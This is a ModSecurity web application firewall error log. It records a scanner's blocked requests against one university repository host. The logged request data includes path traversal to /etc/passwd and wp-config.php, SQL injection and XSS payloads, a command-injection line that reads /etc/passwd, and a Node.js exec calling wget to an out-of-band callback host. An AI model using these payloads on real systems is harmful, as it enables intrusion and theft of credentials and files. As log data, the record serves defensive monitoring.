"ZO13ccCo-f0AAAe397kAAAAA"]
[Tue Aug 29 11:43:31.368123 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13c8Co-f0AAAXNucMAAAAg"]
[Tue Aug 29 11:43:31.439101 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAXNucUAAAAg"]
[Tue Aug 29 11:43:36.376756 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAfFKAEAAAAR"]
[Tue Aug 29 11:43:37.468288 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAdftagAAAAG"]
[Tue Aug 29 11:43:40.396392 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAfFKAsAAAAR"]
[Tue Aug 29 11:43:40.468200 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAAdb7rUAAAAb"]
[Tue Aug 29 11:43:42.412806 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAe3990AAAAA"]
[Tue Aug 29 11:43:44.384051 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/file"] [unique_id "ZO13gMCo-f0AAAe1eiwAAAAB"]
[Tue Aug 29 11:43:45.368142 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAeChe8AAAAw"]
[Tue Aug 29 11:43:47.422770 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAAeX1I0AAAAK"]
[Tue Aug 29 11:43:48.399170 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAdftccAAAAG"]
[Tue Aug 29 11:43:48.468436 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAdftcoAAAAG"]
[Tue Aug 29 11:43:49.441783 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAcsLNcAAAAE"]
[Tue Aug 29 11:43:50.404225 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repository.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAAeChgoAAAAw"]
[Tue Aug 29 11:43:50.450907 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAARphAUAAAAU"]
[Tue Aug 29 11:43:51.406696 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAdxUaMAAAAC"]
[Tue Aug 29 11:43:55.478785 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAe8l6EAAAAF"]
[Tue Aug 29 11:43:55.763303 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAfky7gAAAAi"]
[Tue Aug 29 11:43:57.372592 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAenGdIAAAAM"]
[Tue Aug 29 11:43:57.388983 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jcCo-f0AAAfZj0sAAAAN"]
[Tue Aug 29 11:43:58.388764 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAfZj04AAAAN"]
[Tue Aug 29 11:43:59.389023 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAe8l7YAAAAF"]
[Tue Aug 29 11:44:03.580345 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAeX1LcAAAAK"]
[Tue Aug 29 11:44:03.741588 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAenGd8AAAAM"]
[Tue Aug 29 11:44:08.380913 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAdOeYoAAAAS"]
[Tue Aug 29 11:44:08.415382 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13mMCo-f0AAAcsLQ4AAAAE"]
[Tue Aug 29 11:44:08.435560 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAcsLQ8AAAAE"]
[Tue Aug 29 11:44:10.677268 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAftVCkAAAAf"]
[Tue Aug 29 11:44:13.483440 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAdQ3pUAAAAV"]
[Tue Aug 29 11:44:14.427448 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAftVDcAAAAf"]
[Tue Aug 29 11:44:16.473121 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26gf8o31ho9nb6kq.oast.site found within TX:1: cjmnbitjmimt14dgn26gf8o31ho9nb6kq.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAfky-UAAAAi"]
[Tue Aug 29 11:44:19.373262 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13o8Co-f0AAAc4ExsAAAAP"]
[Tue Aug 29 11:44:20.381431 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26gkoz51prkdfup7.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAfky-wAAAAi"]
